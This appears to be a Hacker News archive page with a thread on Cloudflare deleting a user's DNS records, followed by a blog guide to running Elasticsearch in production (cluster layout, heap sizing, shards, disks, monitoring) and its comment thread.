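resp = dns.query.https(q, 'https://doh.example.org/dns-query')
for rrset in resp.answer:
    print(rrset)

Firefox can then be pointed at the same URL via network.trr.uri in about:config.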

craftinator(10000) about 20 hours ago [-]

If you run a restaurant, you can refuse to do business with anyone you choose. If that was not the case, you would effectively be a slave; unable to choose actions for yourself and your business. Cloudflare refused to do business with people and content; that is their prerogative.

lexicality(10000) about 23 hours ago [-]

While there are a lot of reasons not to trust cloudflare, the fact that they stopped hosting nazis and pedophiles doesn't seem like a good one to open with imo

dana321(10000) about 23 hours ago [-]

Cloudflare. A great solution if you want nobody to be able to easily access your website.

wackget(10000) about 22 hours ago [-]

What are some alternatives which offer DDOS/flood/spam protection?

iudqnolq(3915) about 23 hours ago [-]

OP here. My website wasn't up when this happened because of some yak shaving, but when it is up I disable DDoS protection. I was only using Cloudflare for domain registration and DNS.

I don't think I have ethical issues with DDOS protection in general, but as someone who browses using Firefox on Linux with tracking blocking I know how annoying it can get. If I don't need it why bother? Plus I generally like to minimize opaque layers in my 'stack'.

tus88(10000) about 23 hours ago [-]

The ultimate website blocker.

RcouF1uZ4gsC(4119) about 23 hours ago [-]

Be wary of being part of something that is a cost center for the company instead of a profit center.

CloudFlare is selling domains at cost. That means they are not making any money from being a domain registrar, which means they will do everything to keep the cost of doing it as low as possible for themselves. This means a lack of customer service and the use of ML dragnets for 'anomalous' behavior.

owenmarshall(10000) about 22 hours ago [-]

.com has a price floor of $7.85. Most registrars seem to target anywhere from the $9.99 - $14.99 range for registration because, as far as I can tell, there is no real differentiation outside of price.

Sure, I could spend $lots to get a dedicated account rep from MarkMonitor or CSC but that's not really feasible for my personal site.

Are there really any registrars that hit a reasonable price point for individuals and offer service beyond bargain basement? Because if so I'm doing some transfers this weekend.

judge2020(4263) about 23 hours ago [-]

Can't think of a reason this domain was touched (I don't work for CF) but I'd recommend reading the threads related to this search:

https://community.cloudflare.com/search?q=127.0.0.1%20audit

Every related incident seems to be due to either nameservers temporarily/accidentally changed away from CF (and CF's service perhaps not re-checking) or the registration billing failing (which doesn't look to be the case, since the registration expires in 2021[0]). The latest change to the domain was about a week ago[0], so if that was when it was transferred to CF, it might be the first scenario.

> Because Cloudflare deleted my domain registration I can't change the status from clientTransferProhibited through their dashboard so I don't think I can even leave.

Unless something else happened, deleting the zone from your account doesn't affect the registration. Re-adding the domain will instantly allow you to view the registration info and likely transfer away; this would only not work if the zone is banned for some reason.

0: https://who.is/whois/danielzfranklin.org

crooked-v(4308) about 22 hours ago [-]

> Re-adding the domain will instantly allow you to view the registration info

'Your domain registration configuration depends on your DNS zone configuration' is a very strange way to do things.

iudqnolq(3915) about 22 hours ago [-]

OP here.

> Every related incident seems to be due to either nameservers temporarily/accidentally changed away from CF (and CF's service perhaps not re-checking) or the registration billing failing (which doesn't look to be the case, since the registration expires in 2021[0]).

The changes a week ago involved adding and deleting TXT and A records only. Cloudflare manages the nameservers I use as my registrar, and I never changed them from the default. I just confirmed all of that in the Cloudflare audit log.

> Unless something else happened, deleting the zone from your account doesn't affect the registration. Re-adding the domain will instantly allow you to view the registration info and likely transfer away; this would only not work if the zone is banned for some reason.

Thank you so much! Trying that now.

Paul-ish(4241) about 22 hours ago [-]

> However, I'm unable to log in to their community forum. When I click the login button I'm redirected to my dashboard, and when I then click Support on the dashboard I'm redirected back to the forum without being logged in. I suppose it's possibly an issue with Firefox blocking cookies (although I disabled tracking prevention) so it's possible this part is partly a problem on my end.

I run into issues like this more and more, where you hit some strange behavior on a website and you wonder 'How did this ever make it into production?', then you open the website in Chrome and the flows work fine. I worry that Firefox is becoming less and less viable.

_def(10000) about 21 hours ago [-]

If a service doesn't function properly without tracking I wouldn't blame it on a privacy respecting browser.

mark_and_sweep(10000) about 21 hours ago [-]

This is not Firefox becoming less and less viable. This is developers caring less and less about supporting older browsers, less capable hardware and, I guess, long-term maintenance in general.

Just had a similar case today: My Mom tried to order something online on her old Android tablet - and it didn't work. She blamed the tablet for it, saying 'It's just too old, it doesn't work correctly anymore! I used to be able to order stuff on this website'. I had to explain to her that her tablet is still working fine, it's just the website that is broken because it's not supporting her device (or browser) anymore. Shockingly, she listed quite a few websites, which she has used for years, which have stopped working for her in the past few months and years; all of these she mentioned as evidence that the problem must be her tablet - not the websites. When I opened two of the sites she mentioned, I wasn't too surprised to find very shiny, very modern single-page applications (with service workers registered and even WebAssembly used on one of them)..

So when you are creating a modern web app, please don't just test in Chrome on your new MacBook Pro. Think about your Mom. Ask yourself: 'Is this still gonna work on her crappy old device?'

dariusj18(10000) about 22 hours ago [-]

Cloudflare once deleted one of my domains because the NS records were set in the wrong order.

jlgaddis(2975) about 21 hours ago [-]

Wrong order? Since when do NS RRs have to be in any certain order?

LinuxBender(150) about 22 hours ago [-]

What do you mean by wrong order? Do you mean the NS records in the zone file were after a delegation / referral? What RFC was your zone breaking?

whatthesmack(10000) about 23 hours ago [-]

This is frightening. I just started the process of moving all ~60 of my domains from Amazon Registrar + Google Cloud DNS to Cloudflare, and will definitely wait until somebody from Cloudflare chimes in here to clarify what's going on.

Jerry2(98) about 22 hours ago [-]

> moving all ~60 of my domains from Amazon Registrar + Google Cloud DNS to Cloudflare

You're very brave considering that Cloudflare doesn't even have U2F yet Google and Amazon do.

flurdy(4191) about 22 hours ago [-]

Don't put all your eggs in one basket, ie. don't just use one provider.

Also for your core domains, do not let the registrar and dns provider be the same entity.

Also, don't decide on not migrating just because of one bad experience. None of them are perfect, though vigilance is wise.

(I know I am probably preaching to the choir :) )

iudqnolq(3915) about 22 hours ago [-]

OP here. I'm considering moving to Amazon Registrar. Why are you leaving?

freedomben(2733) about 22 hours ago [-]

I'd been planning to move too, but am now also going to wait to see where this goes. DNS is obviously a critical system and I don't know if I can trust Cloudflare now. I'm not a big fish that can make noise. I'm an easy victim.

dvno42(4311) about 23 hours ago [-]

Funny that this is coming up. I just transferred over from Namecheap to Cloudflare a few days ago and had a similar issue. One of my A records (out of about 20) was missing after the transfer.

iudqnolq(3915) about 23 hours ago [-]

I noticed that if you don't unfocus the input field by focusing somewhere else on the page it may not save. That may be what happened to you.

oefrha(4141) about 23 hours ago [-]

Unrelated issue but sometimes Cloudflare docs/communications are not in sync with their actual system which is immensely frustrating. I was bitten a few times.

For instance, a while back I forgot to renew one of my side project domains so it briefly expired for maybe a day or two. Got this email from Cloudflare saying

> Your DNS records will be completely removed from our system in 7 days.

> ...

> Once you have completed this change, click the "Recheck Nameservers" button in your Cloudflare dashboard to ensure your domain stays active on Cloudflare.

I promptly renewed, except there's no 'Recheck Nameservers' button anywhere, and the dashboard still read 'Moved' for maybe a day. Eventually the problem was just gone, but the communication worried me that entire time.

(I do appreciate Cloudflare's service, though.)

outworlder(3729) about 22 hours ago [-]

> Your DNS records will be completely removed from our system in 7 days.

This sounds like the plot of a Japanese horror movie.

fernandotakai(3604) about 23 hours ago [-]

as much as i like cloudflare (and i like them a lot), it's kind of absurd that this kind of thing can happen. a lot of red flags that, if true, would mean their infrastructure requires a lot more care (127.0.0.1 as the source of an audit event? no email when DNS records are deleted? no 1-to-1 message after this happened?).

ocdtrekkie(2833) about 23 hours ago [-]

At the very least, this sort of lack of good process is definitely what happens when Google decides to cut you off (and another person just commented a similar experience with Amazon), but I suspect it's likely the case for a much larger number of companies and services than people realize. It's fundamental internet architecture, and often little more thought goes into account termination than what you'd do to ban someone from your mid-2000s phpBB forum.

So much business focus goes into the onboarding experience, and since you assume all of the people your service terminates are 'probably bad people anyways', not a lot of thought goes into offboarding, or ideally, appeals.

thedanbob(10000) about 23 hours ago [-]

I had an issue with them recently where a SRV record pointing to "." (meaning "service unavailable") was being rewritten to the string "false". It didn't take them too long to fix it, but it made me wonder how they managed to push a bug like that to production without some sort of automated test catching it.

daenz(578) about 23 hours ago [-]

This happened to me with AWS somewhat recently[0], and I never found out exactly what happened. I just chalk it up to some dev making a mistake and not telling anyone. It's pretty alarming when things like this happen, though.

0. https://news.ycombinator.com/item?id=21326014

jcrites(4212) about 21 hours ago [-]

I've been involved in using Route 53 to manage thousands of DNS zones, and haven't come across something like that. I'd recommend putting in a support request via the account that was affected to ensure that it gets looked at.

If you haven't already, you might consider checking the CloudTrail logs for the account in question to see if there were any API commands related to the zone.

use-net(10000) about 22 hours ago [-]

cloudns.net does it in a slightly more customer-friendly way:

they e-mailed me saying they had deleted some domains, not because some entries were broken or problematic, but just because they were 'underused', i.e. got too few DNS resolve calls. So the tiny data packets on their nameserver caused them unnecessary consumption of electricity or whatever. Very compelling! This is how they do business these days.

They bombarded people with all sorts of useless info, but not about this policy of theirs. Makes you feel very much like the proverbial 'valued customer'.

Everything is going downhill in this century, that's a fact.

MrStonedOne(10000) about 15 hours ago [-]

Edit: the DNS record export/import functionality is hidden behind the advanced search dropdown for some reason. Ignore this entire comment.

From reading the linked help doc, apparently your entire domain can get removed from Cloudflare if your registrar stops reporting Cloudflare's servers in the NS records.

The mere idea of having to re-enter all hundred or so of our DNS records, using Cloudflare's add-DNS-record interface with its 1.2-second delay at every step, because Namecheap bugged out for a few seconds, is horrifying.

There is no way to export all of these, there is no way to import or mass-add, and I don't think they can lean on the API to save them here.

DNS records are data; DNS records are sometimes important un-backed-up customer data. Cloudflare does not offer a way for customers to back this data up, nor a way to restore or recover from a backup, yet it acts very callously with this data, deleting it in automated systems based on data from third-party providers.

Not a good look.

Hello71(4144) about 15 hours ago [-]

I googled 'cloudflare dns import' and 'cloudflare dns export' and the first result both times was an apparently official support article giving step-by-step instructions on how to do so. I myself used this function about six years ago, so this is not new or untested functionality.

donmcronald(10000) about 15 hours ago [-]

You can export a zone file, and the auto-deletion takes days. Your site would be offline before the zone gets deleted. I don't like it a ton, but it's not even close to what you're saying.
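For anyone who wants that backup automated, a minimal sketch against Cloudflare's v4 export endpoint, which returns a BIND-format zone file; the zone ID and token are placeholders:

import requests

ZONE_ID = 'your-zone-id'
HEADERS = {'Authorization': 'Bearer YOUR_API_TOKEN'}

resp = requests.get(
    f'https://api.cloudflare.com/client/v4/zones/{ZONE_ID}/dns_records/export',
    headers=HEADERS,
)
resp.raise_for_status()
with open('zone-backup.txt', 'w') as f:
    f.write(resp.text)  # re-importable via the dashboard or another provider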

gist(2274) about 22 hours ago [-]

> Does anyone know what might have caused Cloudflare to delete my domain? Any ideas for how I could transfer my domain away from Cloudflare sooner?

I don't get the point of the 'shoot first, ask questions later' type of approach. Obviously it would pay to get some kind of affirmative reply from Cloudflare prior to a post that everyone here, with incomplete information, speculates and wastes time on (like I am doing).

Also, Cloudflare did not 'delete the domain'; it deleted the DNS records. There is a difference, and no, I am not being pedantic either. How would 'the internet' know why this was done? There could be any number of good or bad reasons.

Lastly, the domain is not expired, and as such the registrar is required (per ICANN) to supply an auth code so someone can transfer out, or to allow the customer to change the primary and secondary DNS to another DNS provider. There is nothing (legitimate) that allows Cloudflare, as either a DNS provider or a registrar, to lock the domain up (other than a legal court order) just because they decide to.

johnklos(10000) about 21 hours ago [-]

> I don't get the point of 'shoot first ask questions later' type approach.

At first I thought you were talking about Cloudflare shooting first, but apparently not.

iudqnolq(3915) about 22 hours ago [-]

OP here.

> Also, Cloudflare did not 'delete the domain'; it deleted the DNS records. There is a difference, and no, I am not being pedantic either.

Thanks. You're absolutely right. I meant delete their record of the domain as it shows up in the UI of their dashboard.

> How would 'the internet' know why this was done? There could be any number of good or bad reasons.

For many reasons luckily HN isn't 'the internet'. I've already gotten some good suggestions.

> Lastly, the domain is not expired, and as such the registrar is required (per ICANN) to supply an auth code so someone can transfer out, or to allow the customer to change the primary and secondary DNS to another DNS provider. There is nothing (legitimate) that allows Cloudflare, as either a DNS provider or a registrar, to lock the domain up (other than a legal court order) just because they decide to.

I know. Again, I guess I was insufficiently specific. Cloudflare has warned me to expect long wait times before I can talk to a customer support rep. My question was if there's a way to transfer out without needing to wait on a slow support loop.

isclever(10000) about 22 hours ago [-]

My takeaway:

1. Set up monitoring on your critical domains. UptimeRobot and Hetrixtools are good starters with generous free tiers. You should know when your website/email/DNS isn't working.

2. Don't tie your domain registration with your DNS provider. You lose everything if something goes wrong with your account.

3. Be able to jump ship easily, have backups of your zone, already know where you will transfer to.

djsumdog(840) about 22 hours ago [-]

> UptimeRobot and Hetrixtools are good starters with generous free tier

Are there any open source status pages/monitoring programs that have built-in checks for HTTPS, DNS records (IPv4/6), arbitrary port checks, etc.? I'd rather just set up a status page/alert app on a $5 minimal DO/Vultr node and self-host/support/contribute to a FOSS program than use a commercial provider.
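Even without a full FOSS suite, a tiny self-hosted check covers two of those boxes, TCP reachability and TLS certificate expiry; the host and port are placeholders, and you'd cron this on that $5 node:

import datetime
import socket
import ssl

HOST, PORT = 'example.com', 443

# Open a TCP connection, complete a TLS handshake, and read the cert expiry.
with socket.create_connection((HOST, PORT), timeout=5) as sock:
    ctx = ssl.create_default_context()
    with ctx.wrap_socket(sock, server_hostname=HOST) as tls:
        not_after = tls.getpeercert()['notAfter']
        expiry = datetime.datetime.strptime(not_after, '%b %d %H:%M:%S %Y %Z')
        print(f'{HOST}:{PORT} reachable, cert expires {expiry:%Y-%m-%d}')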

iudqnolq(3915) about 22 hours ago [-]

> Set up monitoring on your critical domains. UptimeRobot and Hetrixtools are good starters with generous free tiers. You should know when your website/email/DNS isn't working.

Lesson learned :)

> Don't tie your domain registration with your DNS provider. You lose everything if something goes wrong with your account.

I don't see how that helps. How do I recover from my registrar deleting/disabling my account even if DNS is somewhere else? I think there's still only one failure point and the lesson is that I need to pay that failure point more money.

> Be able to jump ship easily, have backups of your zone,

Luckily I have that

> already know where you will transfer to.

Any suggestions? Ironically, I recently moved from Google Domains to Cloudflare because I was worried about issues with opaque support. I've learned my lesson about picking based on cost alone, but I'm a college student who can't afford something too heavy-duty.

throwawaydns101(10000) about 23 hours ago [-]

DNS has become frighteningly unreliable. Here are previous stories that show how it is possible to lose access to your domain for no fault of yours:

(1) https://news.ycombinator.com/item?id=21700139 - Sinkholed

(2) https://news.ycombinator.com/item?id=19322966 - I lost my domain and everything that goes with it

No different from this story, where the author's DNS records were deleted because of a so-called 'anomaly'.

Here are so many more stories: https://news.ycombinator.com/item?id=21710939

DNS was a good idea but now there are organizations that have the power to arbitrarily take control and even remove your domain names and records. We really need to come up with a peer-to-peer solution and take back control of the naming system from these authorities.

Defenestresque(10000) about 21 hours ago [-]

>DNS has become frighteningly unreliable. Here are previous stories that show how it is possible to lose access to your domain for no fault of yours:

The second story you posted is about a user who forgot to renew their domain and did not wish to pay the overly-inflated fee to re-register it while it was in the grace period.

I hold no love for any registrar that jacks up rates for getting back an expired domain and agree that they should have sent a reminder email, but describing this as someone 'losing their domain through no fault of their own' is, frankly, incredibly misleading.

The user:

1) forgot to renew their domain,
2) had full right to recover their domain but objected to the price,
3) had full right to transfer the domain out to another registrar for the original 15EUR price, and
4) eventually got back full control of the domain.

nathancahill(2861) about 23 hours ago [-]

Odd comment to make a throwaway for, not very controversial (unless you work for Cloudflare?)

Legogris(4307) about 22 hours ago [-]

I looked into self-hosting DNS and, to be honest, it doesn't seem like that big of a deal as long as you can ensure uptime. If you set up the first two nameservers on different hosts and possibly have #3/4 be cloud providers, I think you're pretty good.

Does anyone here have experience with running their own DNS servers for their domains?





Historical Discussions: Guide to running Elasticsearch in production (February 23, 2020: 642 points)

(669) Guide to running Elasticsearch in production

669 points 2 days ago by thunderbong in 2272nd position

facinating.tech | Estimated reading time – 16 minutes | comments | anchor

If you are here, I do not need to tell you that Elasticsearch is awesome, fast and mostly just works. If you are here, I also do not need to tell you that Elasticsearch can be opaque, confusing, and seems to break randomly for no reason. In this post I want to share my experiences and tips on how to set up Elasticsearch correctly and avoid common pitfalls. I am not here to make money so I will mostly just jam everything into one post instead of doing a series. Feel free to skip sections.

The basics: Clusters, Nodes, Indices and Shards

If you are really new to Elasticsearch (ES) I want to explain some basic concepts first. This section will not explain best practices at all, and focuses mainly on explaining the nomenclature. Most people can probably skip this.

Elasticsearch is a management framework for running distributed installations of Apache Lucene, a Java-based search engine. Lucene is what actually holds the data and does all the indexing and searching. ES sits on top of this and allows you to run potentially many thousands of lucene instances in parallel.

The highest level unit of ES is the cluster. A cluster is a collection of ES nodes and indices.

Nodes are instances of ES. These can be individual servers or just ES processes running on a server. Servers and nodes are not the same. A VM or physical server can hold many ES processes, each of which will be a node. Nodes can join exactly one cluster. There are different types of nodes, the two most interesting of which are the Data Node and the Master-eligible Node. A single node can be of multiple types at the same time. Data nodes run all data operations: storing, indexing and searching of data. Master-eligible nodes vote for a master that runs the cluster and index management.

Indices are the high-level abstraction of your data. Indices do not hold data themselves. They are just another abstraction for the thing that actually holds data. Any action you do on data such as INSERTS, DELETES, indexing and searching run against an Index. Indices can belong to exactly one cluster and are comprised of Shards.

Shards are instances of Apache Lucene. A shard can hold many Documents. Shards are what does the actual data storage, indexing and searching. A shard belongs to exactly one node and index. There are two types of shards: primary and replica. These are mostly the exact same. They hold the same data, and searches run against all shards in parallel. Of all the shards that hold the same data, one is the primary shard. This is the only shard that can accept indexing requests. Should the node that the primary shard resides on die, a replica shard will take over and become the primary. Then, ES will create a new replica shard and copy the data over.

At the end of the day, we end up with something like this:

A more in-depth look at Elasticsearch

If you want to run a system, it is my belief that you need to understand the system. In this section I will explain the parts of Elasticsearch I believe you should understand if you want to manage it in production. This will not have any recommendations in it; those come later. Instead it aims purely at explaining necessary background.

Quorum

It is very important to understand that Elasticsearch is a (flawed) democracy. Nodes vote on who should lead them, the master. The master runs a lot of cluster-management processes and has the last say in many matters. ES is a flawed democracy because only a subclass of citizens, the master-eligible nodes, are allowed to vote. Master-eligible are all nodes that have this in their configuration:

node.master: true

On cluster start or when the master leaves the cluster, all master-eligible nodes start an election for the new master. For this to work, you need to have 2n+1 master-eligible nodes. Otherwise it is possible for two partitions to each receive 50% of the votes, a split-brain scenario that will lead to the loss of all data in one of the two partitions. So don't let this happen. You need 2n+1 master-eligible nodes.
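
As a minimal sketch of what a dedicated master-eligible node's elasticsearch.yml might contain (assuming Elasticsearch 7.x, where the initial voting configuration is bootstrapped from a list of node names; the node names here are hypothetical):

  node.master: true
  node.data: false
  cluster.initial_master_nodes: ["master-1", "master-2", "master-3"]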

How nodes join the cluster

When an ES process starts, it is alone in the big, wide world. How does it know what cluster it belongs to? There are different ways this can be done. However, these days the way it should be done is using what is called Seed Hosts.

Basically, Elasticsearch nodes talk with each other constantly about all the other nodes they have seen. Because of this, a node only needs to know a couple of other nodes initially to learn about the whole cluster. Let's look at this example of a three-node cluster:

Initial state.

In the beginning, Node A and C just know B. B is the seed host. Seed hosts are either given to ES in the form of a config file or they are put directly into elasticsearch.yml.
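
For reference, the corresponding elasticsearch.yml line on nodes A and C might look like this (a sketch assuming Elasticsearch 7.x; the hostname is hypothetical and stands in for node B):

  discovery.seed_hosts: ["node-b.example.com:9300"]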

Node A connects and exchanges information with B

As soon as node A connects to B, B now knows of the existence of A. For A, nothing changes.

Node C connects and shares information with B

Now, C connects. As soon as this happens, B tells C about the existence of A. C and B now know all nodes in the cluster. As soon as A connects to B again, it will also learn of the existence of C.

Segments and segment merging

Above I said that shards store data. This is only partially true. At the end of the day, your data is stored on a file system in the form of files. In Lucene, and with that also Elasticsearch, these files are called Segments. A shard will have anywhere from one to multiple thousands of segments.

Again, a segment is an actual, real file you can look at in the data directory of your Elasticsearch installation. This means that using a segment is overhead. If you want to look into one, you have to find and open it. That means if you have to open many files, there will be a lot of overhead. The problem is that segments in Lucene are immutable. That is fancy language for saying they are only written once and cannot be changed. This in turn means that every document you put into ES will create a segment with only that single document in it. So clearly, a cluster that has a billion documents has a billion segments which means there are a literal billion files on the file system, right? Well, no.

In the background, Lucene does constant segment merging. It cannot change segments, but it can create new ones with the data of two smaller segments.

This way, Lucene constantly tries to keep the number of segments, which means the number of files, which means the overhead, small. It is possible to force this process by using a force merge.

Message routing

In Elasticsearch, you can run any command against any node in a cluster and the result will be the same. That is interesting because at the end of the day a document will live in only one primary shard and its replicas, and ES does not know where. There is no mapping saying a specific document lives in a specific shard.

If you are searching, then the ES node that gets the request will broadcast it to all shards in the index. This means primary and replica. These shards then look into all their segments for that document.

If you are inserting, then the ES node will route the document to one of the primary shards (by default based on a hash of the document ID). It is then written to that primary shard and all of its replicas.

So how do I run Elasticsearch in production?

Finally, the practical part. I should mention that I managed ES mostly for logging. I will try to keep this bias out of this section, but will ultimately fail.

Sizing

The first question you need to ask and subsequently answer yourself, is about sizing. What size of ES cluster do you actually need?

RAM

I am talking about RAM first, because your RAM will limit all other resources.

Heap

ES is written in Java. Java uses a heap. You can think of this as Java-reserved memory. There are all kinds of things about the heap that matter, which would triple this document in size, so I will get down to the most important part, which is heap size.

Use as much as possible, but no more than 30G of heap size.

Here is a dirty secret many people don't know about heap: every object in the heap needs a unique address, an object pointer. Below a certain heap size, Java can use compressed object pointers; above it, Java has to fall back to full-width, uncompressed ones. Every pointer then takes twice the space, caches hold fewer of them, and memory access effectively gets slower. You 100% do not want to get over this threshold, which is somewhere around 32G.

I once spent an entire week locked in a dark room doing nothing else but using esrally to benchmark different combinations of file systems, heap sizes, and BIOS settings for Elasticsearch. Long story short, here is what it had to say about heap size:

Index append latency, lower is better

The naming convention is fs_heapsize_biosflags. As you can see, starting at 32G of heap size performance suddenly starts getting worse. Same with throughput:

Index append median throughput. Higher is better.

Long story short: use 29G of RAM or 30 if you are feeling lucky, use XFS, and use hardwareprefetch and llc-prefetch if possible.
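
In practice, that heap recommendation is applied by pinning the minimum and maximum heap to the same value in Elasticsearch's jvm.options file:

  -Xms29g
  -Xmx29g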

FS cache

Most people run Elasticsearch on Linux, and Linux uses RAM as file system cache. A common recommendation is to use 64G for your ES servers, with the idea that it will be half cache, half heap. I have not tested FS cache. However, it is not hard to see that large ES clusters, like for logging, can benefit greatly from having a big FS cache. If all your indices fit in heap, not so much.

CPU

This depends on what you are doing with your cluster. If you do a lot of indexing, you need more and faster CPUs than if you just do logging. For logging, I found 8 cores to be more than sufficient, but you will find people out there using way more since their use case can benefit from it.

Disk

Not as straightforward as you might think. First of all, if your indices fit into RAM, your disk only matters when the node is cold. Secondly, the amount of data you can actually store depends on your index layout. Every shard is a Lucene instance and they all have memory requirements. That means there is a maximum number of shards you can fit into your heap. I will talk more about this in the index layout section.

Generally, you can put all your data disks into a RAID 0. You should replicate on Elasticsearch level, so losing a node should not matter. Do not use LVM with multiple disks as that will write only to one disk at a time, not giving you the benefit of multiple disks at all.

Regarding file system and RAID settings, I have found the following things:

  • Scheduler: cfq and deadline outperform noop. Kyber might be good if you have nvme but I have not tested it
  • QueueDepth: as high as possible
  • Readahead: yes, please
  • Raid chunk size: no impact
  • FS block size: no impact
  • FS type: XFS > ext4
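
A rough sketch of how these settings are commonly applied on Linux (device names are hypothetical; check the paths and values for your own hardware and kernel):

  # set the I/O scheduler on the data disk (cfq or deadline, per the list above)
  echo deadline > /sys/block/sda/queue/scheduler
  # enable readahead (value is in 512-byte sectors)
  blockdev --setra 4096 /dev/sda
  # stripe the data disks into a RAID 0 array and format it with XFS
  mdadm --create /dev/md0 --level=0 --raid-devices=2 /dev/sda /dev/sdb
  mkfs.xfs /dev/md0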

Index layout

This highly depends on your use case. I can only talk from a logging background, specifically using Graylog.

Shards

Short version:

  • for write heavy workloads, primary shards = number of nodes
  • for read heavy workloads, primary shards * replication = number of nodes
  • more replicas = higher search performance

Here is the thing. If you write stuff, the maximum write performance you can get is given by this equation:

node_throughput*number_of_primary_shards

The reason is very simple: if you have only one primary shard, then you can write data only as quickly as one node can write it, because a shard only ever lives on one node. If you really wanted to optimize write performance, you should make sure that every node only has exactly one shard on it, primary or replica, since replicas obviously get the same writes as the primary, and writes are largely dependent on disk IO. Note: if you have a lot of indexing this might not be true and the bottleneck could be something else.

If you want to optimize search performance, search performance is given by this equation:

node_throughput*(number_of_primary_shards + number_of_replicas)

For searching, primary and replica shards are basically identical. So if you want to increase search performance, you can just increase the number of replicas, which can be done on the fly.
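
To illustrate (the index name and numbers are hypothetical): the number of primary shards is fixed when an index is created, while the replica count can be changed on a live index:

  curl -X PUT 'http://localhost:9200/my-index' -H 'Content-Type: application/json' -d '
  {"settings": {"number_of_shards": 4, "number_of_replicas": 1}}'

  curl -X PUT 'http://localhost:9200/my-index/_settings' -H 'Content-Type: application/json' -d '
  {"index": {"number_of_replicas": 2}}'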

Size

Much has been written about index size. Here is what I found:

30G of heap = 140 shards maximum per node

Using more than 140 shards, I had Elasticsearch processes crash with out-of-memory errors. This is because every shard is a Lucene instance, and every instance requires a certain amount of memory. That means there is a limit for how many shards you can have per node.

If you have the amount of nodes, shards and index size, here is how many indices you can fit:

number_of_indices = (140 * number_of_nodes) / (number_of_primary_shards * replication_factor)

From that and your disk size, you can easily calculate how big the indices have to be:

index_size = (number_of_nodes * disk_size) / number_of_indices
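
For example, with assumed numbers of 10 nodes, 4 primary shards, a replication factor of 2, and 2TB of disk per node:

  number_of_indices = (140 * 10) / (4 * 2) = 175
  index_size = (10 * 2000GB) / 175 ≈ 114GB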

However, keep in mind that bigger indices are also slower. For logging it is fine to a degree but for really search heavy applications, you should size more towards the amount of RAM you have.

Segment merging

Remember that every segment is an actual file on the file system. More segments = more overhead in reading. Basically for every search query, it goes to all the shards in the index, and from there to all the segments in the shards. Having many segments drastically increases read-IOPS of your cluster up to the point of it becoming unusable. Because of this it's a good idea to keep the number of segments as low as possible.

There is a force_merge API that allows you to merge segments down to a certain number, like 1. If you do index rotation, for example because you use Elasticsearch for logging, it is a good idea to do regular force merges when the cluster is not in use. Force merging takes a lot of resources and will slow your cluster down significantly. Because of this, it is a good idea not to let Graylog (for example) do it for you, but to do it yourself when the cluster is used less. You definitely want to do this if you have many indices, though. Otherwise, your cluster will slowly crawl to a halt.
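
For reference, merging an index down to a single segment looks like this (the index name is hypothetical):

  curl -X POST 'http://localhost:9200/graylog_42/_forcemerge?max_num_segments=1'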

Cluster layout

For everything but the smallest setups it is a good idea to use dedicated master-eligible nodes. The main reason is that you should always have 2n+1 master-eligible nodes to ensure quorum, but for data nodes you just want to be able to add a new one at any time, without having to worry about this requirement. Also, you don't want high load on the data nodes to impact your master nodes.

Finally, master nodes are ideal candidates for seed nodes. Remember that seed nodes are the easiest way to do node discovery in Elasticsearch. Since your master nodes will seldom change, they are the best choice for this, as they most likely already know all other nodes in the cluster.

Master nodes can be pretty small, one core and maybe 4G of RAM is enough for most clusters. As always, keep an eye on actual usage and adjust accordingly.

Monitoring

I love monitoring, and I love monitoring Elasticsearch. ES gives you an absolute ton of metrics and it gives you all of them in the form of JSON, which makes it very easy to pass into monitoring tools. Here are some helpful things to monitor:

  • number of segments
  • heap usage
  • heap GC time
  • avg. search, index, merge time
  • IOPS
  • disk utilization
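
Most of these can be scraped straight from the stats APIs; for example, against a local node:

  curl 'http://localhost:9200/_cluster/health?pretty'
  curl 'http://localhost:9200/_nodes/stats/jvm,indices?pretty'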

Conclusion

After around 5 hours of writing this, I think I dumped everything important about ES that is in my brain into this post. I hope it saves you many of the headaches I had to endure.

Resources

https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-node.html
https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-discovery-quorums.html
https://github.com/elastic/rally
https://tech.ebayinc.com/engineering/elasticsearch-performance-tuning-practice-at-ebay/




All Comments: [-] | anchor

animalnewbie(10000) 2 days ago [-]

Is there a non-Java alternative to this ES/Logstash stuff? Preferably rust or a native lang, but okay with CLR too. I'm not comfortable running Java in production after previous memory issues...

rjkennedy98(10000) 2 days ago [-]

MarkLogic is an alternative, but it isn't free.

staticautomatic(4217) 2 days ago [-]

Couchbase could be a reasonable alternative, depending upon your requirements. Couchbase is written in Erlang iirc and Couchbase's indexing is written in Go.

BossingAround(4110) 2 days ago [-]

You should give it another try. New versions of Java have made great progress in the memory area.

I feel like a lot of hate Java gets nowadays is largely due to historical reasons.

Though come to think of it, if you're talking about ES itself and not Java, then I have no idea, I never used ES in prod.

CameronNemo(4096) 2 days ago [-]

You can check out https://vector.dev/ to replace Logstash. Not sure about replacing Elasticsearch with something non-Java. Especially for the search use case -- Lucene is fairly dominant. For metrics you have prometheus (Go, not sure if that is better for memory issues with the non-tunable GC). You will probably want/need a clustered storage backend for prometheus. For that you have lots of options: https://prometheus.io/docs/operating/integrations/#remote-en... . Of those, TiKV (Rust), InfluxDB (Go), and TimescaleDB (C - its a Postgresql extension) seem like decent options.

there_the_and(10000) 2 days ago [-]

Unsecured Elasticsearch servers have been implicated in multiple breaches in recent months [1][2]. Since this post is an 'in-depth guide to running Elasticsearch in production,' it should prominently include information related to security and configuration. With tools like these, where there is a learning curve for new users, security can end up treated as an afterthought, leading to these kinds of breaches.

1. https://www.pandasecurity.com/mediacenter/news/billion-consu...

2. https://thedefenceworks.com/blog/250-million-microsoft-recor...

Edited for clarity

skinnyarms(4290) 2 days ago [-]

I just wanted to point out that Elastic has made some changes in the last year or so that help with security like...

* [Making security bits available with the ('free') basic license](https://www.elastic.co/blog/security-for-elasticsearch-is-no...)
* [Releasing Kubernetes Operators with security enabled by default](https://www.elastic.co/guide/en/cloud-on-k8s/current/index.h...)

This has the effect of making most 'getting started' guide setups more secure by default, which is good.

Unfortunately this is a new change and those bits are not in the Apache licensed core offering, but it's still a big improvement IMHO.

cloakandswagger(10000) 2 days ago [-]

This guide is clearly intended to focus on the ops-side of ElasticSearch. No one is being irresponsible, you're basically just complaining that the article was written about one topic instead of another.

Notice how it also doesn't talk about system architecture, load balancers, disaster recovery, etc? It's because the author chose to focus the post on cluster configuration. The topic of security could be its own standalone writeup and I highly doubt that its omission is an endorsement for running an ES cluster totally exposed and unsecured.

caro_douglos(10000) 2 days ago [-]

While we're at it let's touch on how vulnerable nginx is because port 80 is open.

/s

bobjordan(3738) 2 days ago [-]

